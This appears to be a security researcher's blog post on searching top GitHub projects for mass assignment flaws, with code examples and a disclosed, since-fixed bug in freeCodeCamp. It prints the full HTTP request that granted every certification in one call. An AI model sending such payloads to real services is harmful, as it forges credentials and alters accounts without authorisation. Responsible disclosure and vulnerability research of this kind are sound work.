This post discusses the process of searching top GitHub projects for mass assignment vulnerabilities. This led to a fun finding in the #1 most starred GitHub project, freeCodeCamp, where I was able to acquire every coding certification – supposedly representing over 6000 hours of study – in a single request.
With more than 200 million repositories, GitHub is by far the largest code host. While the vast majority of repositories contain boilerplate code, forks, or abandoned side projects, GitHub also hosts some of the most important open source projects. To some extent Linus’s law – “given enough eyeballs, all bugs are shallow” – has been empirically shown on GitHub, as projects with more stars also had more bug fixes. We might therefore expect the top repositories to have a lower number of security vulnerabilities, especially given the incentives to find vulnerabilities such as bug bounties and CVE fame.
Undeterred by Linus’s law, I wanted to see how quickly I could find a vulnerability in a popular GitHub project. The normal approach would be to dig into the code of an individual project, and learn the specific conventions and security assumptions behind it. Combine with a strong understanding of a particular vulnerability class, such as Java deserialization, and use of code analysis tools to map the attack surface, and we have the ingredients to find fantastic exploits which everyone else missed such as Alvaro Munoz’s attacks on Apache Dubbo.
However, to try and find something fast, I wanted to investigate a “wide” rather than a “deep” approach of vuln-hunting. This was motivated by the beta release of GitHub’s new CodeSearch tool. The idea was to find vulnerabilities through querying for specific antipatterns across the GitHub project corpus.
The vulnerability class I chose to focus on was mass assignment, I’ll describe why just after a quick refresher.
A mass assignment vulnerability can occur when an API takes data that a user provides, and stores it without filtering for allow-listed properties. This can enable an attacker to modify attributes that the user should not be allowed to access.
A simple example is when a User model contains a “role” property which specifies whether a user has admin permissions; consider the following User model:
name
email
role
And a user registration function which saves all attributes specified in the request body to a new user instance:
exports.register = (req, res) => {
user = new User(req.body);
user.save();
}
A typical request from a frontend to this endpoint might look like:
POST /users/register
{
"name": "test",
"email": "[email protected]"
}
However, by modifying the request to add the “role” property, a low-privileged attacker can cause its value to be saved. The attacker’s new account will gain administrator privileges in the application:
{
"name": "test",
"email": "[email protected]",
"role": "admin"
}
The mass assignment bug class is #6 on the OWASP API Security Top 10. One of the most notorious vulnerability disclosures, back in 2012, was when researcher Egar Homakov used a mass assignment exploit against GitHub to add his own public key to the Ruby on Rails repository and commit a message directly to the master branch.
This seemed like a good vulnerability class to focus on, for several reasons:
Mass assignment is well known in some webdev communities, particularly Ruby On Rails. Since Rails 4 query parameters must be explicitly allow-listed before they can be used in mass assignments. Additionally, the Brakeman static analysis scanner has rules to catch any potentially dangerous attributes that have been accidentally allow-listed.
Therefore, it seemed worthwhile to narrow the scope to the current web technologies du jour, Node.js apps, frameworks, and object-relational mappers (ORMs). Among these, there’s a variety of ways that mass assignment vulnerabilities can manifest, and less documentation and awareness of them in the community.
To give examples of different ways mass assignment can show up, in the Mongoose ORM, the findOneAndUpdate
() method could facilitate a mass assignment vulnerability if taking attributes directly from the user:
const filter = {_id: req.body.id};
const update = req.body;
const updatedUser = await User.findOneAndUpdate(filter, update);
In the sophisticated Loopback framework, model access is defined in ACLs, where an ACL like the following on a user model would allow a user to modify all their own attributes:
{
"accessType": "*",
"principalType": "ROLE",
"principalId": "$owner",
"permission": "ALLOW",
"property": "*"
},
In the Adonis.js framework, any of the following methods could be used to assign multiple attributes to an object:
User.fill(), User.create(), User.createMany(), User.merge(), User.firstOrCreate(), User.fetchOrCreateMany(), User.updateOrCreate(), User.updateOrCreateMany()
The next step was to put together a shortlist of potentially-vulnerable code patterns like these, figure out how to search for them on GitHub, then filter down to those instances which actually accept user-supplied input.
GitHub’s search feature has often been criticized, and does not feel like it lives up to its potential. There are two major problems for our intended use-case:
stars:>1000
, but it only works when searching metadata such as repository names and descriptions, not when searching through code..,:;/\`'"=*!?#$&+^|~<>(){}[]@
. As key syntactical characters in most languages, it’s a major limitation that they can’t be searched for.The first two results when searching for “user.update(req.body)
” illustrate this:
The first result looks like it might be vulnerable, but is a project with zero stars that has had no commits in years. The second result is semantically different than what we searched. Going through all 6000+ results when 99% of the results are like this is tedious.
These restrictions previously led some security researchers to use Google BigQuery to run complex queries against the 3 terabyte GitHub dataset that was released in 2016. While this can produce good results, it doesn’t appear that the dataset has been updated recently. Further, running queries on such a large amount of data quickly becomes prohibitively expensive.
GitHub’s new CodeSearch tool is currently available at https://cs.github.com/ for those who have been admitted to the technology preview. The improvements include exact string search, an increased number of filters and boolean operators, and better search indexing. The CodeSearch index right now includes 7 million public repositories, chosen due to popularity and recent activity.
Trying the same query as before, the results load a lot faster and look more promising too:
The repositories showing up first actually have stars, however they all have less than 10. Unfortunately only 100 results are currently returned from a query, and once again, none of the repositories that showed up in my searches were particularly relevant. I looked for a way to sort by stars, but that doesn’t exist. So for our purposes, CodeSearch solves one of the problems with GitHub search, and is likely great for searching individual codebases, but is not yet suitable for making speculative searches across a large number of projects.
Looking for a better solution, I stumbled across a third-party service called grep.app. It allows exact match and regex searches, and has only indexed 0.5 million GitHub repositories, therefore excluding a lot of the noise that has clogged up the results so far.
Trying the naïve mass assignment search once again:
Only 22 results are returned, but they are high-quality results! The first repo shown has over 800 stars. I was excited – finally, here was a search engine which could make the task efficient, especially with regex searches.
With the search space limited to top GitHub projects, I could now search for method names and get a small enough selection of results to scan through manually. This was important as “req.body
” or other user input usually gets assigned to another variable before being used in a database query. To my knowledge there is no way to express these data flows in searches. CodeQL is great for tracking malicious input (taint tracking) over a small number of projects, but it can’t be used to make a “wide” query across GitHub.
Searching for “user.updateAttributes(
“, the first match was for freeCodeCamp, the #1 most starred GitHub project, with over 350k stars:
Looking at the code in the first result, we appeared to have a classic mass assignment vulnerability:
function updateUserFlag(req, res, next) {
const { user, body: update } = req;
return user.updateAttributes(update, createStandardHandler(req, res, next));
}
The next step was to ensure that this function could be reached from a public-facing route within the application, and it turned out to be as simple as a PUT call to /update-user-flag
: a route originally added in order that you could change your theme on the site.
I created an account on freeCodeCamp’s dev environment, and also looked at the user model in the codebase to find what attributes I could maliciously modify. Although freeCodeCamp did not have roles or administrative users, all the certificate information was stored in the user model.
Therefore, the exploit simply involved making the following request:
PUT /update-user-flag HTTP/2 Host: api.freecodecamp.dev Cookie: _csrf=lsCzfu4[...] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.freecodecamp.dev/ Csrf-Token: Tu0VHrwW-GJvZ4ly1sVEXjHxSzgPLLj99OLQ Content-Type: application/json Origin: https://www.freecodecamp.dev Content-Length: 518 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Te: trailers { "name": "Mass Assignment", "isCheater": false, "isHonest": true, "isInfosecCertV7":true, "isApisMicroservicesCert":true, "isBackEndCert":true, "is2018DataVisCert":true, "isDataVisCert":true, "isFrontEndCert":true, "isFullStackCert":true, "isFrontEndLibsCert":true, "isInfosecQaCert":true, "isQaCertV7":true, "isInfosecCertV7":true, "isJsAlgoDataStructCert":true, "isRelationalDatabaseCertV8":true, "isRespWebDesignCert":true, "isSciCompPyCertV7":true, "isDataAnalysisPyCertV7":true, "isMachineLearningPyCertV7":true }
After sending the request, a bunch of signed certifications showed up on my profile, each one supposedly requiring 300 hours of work.
Some aspiring developers use freeCodeCamp certifications as evidence of their coding skills and education, so anything that calls into question the integrity of those certifications is bad for the platform. There are certainly other ways to cheat, but those require more effort than sending a single request.
I reported this to freeCodeCamp, and they promptly fixed the vulnerability and released a GitHub security advisory.
Overall, it turned out that a third-party service, grep.app, is much better than both GitHub’s old and new search for querying across a large number of popular GitHub projects. The fact that we were able to use it to so quickly discover a vuln in a top repository suggests there’s a lot more good stuff to find. The key was to be highly selective so as to not get overwhelmed by results.
I expect that GitHub CodeSearch will continue to improve, and hope they will offer a “stars” qualifier by the time the feature reaches general availability.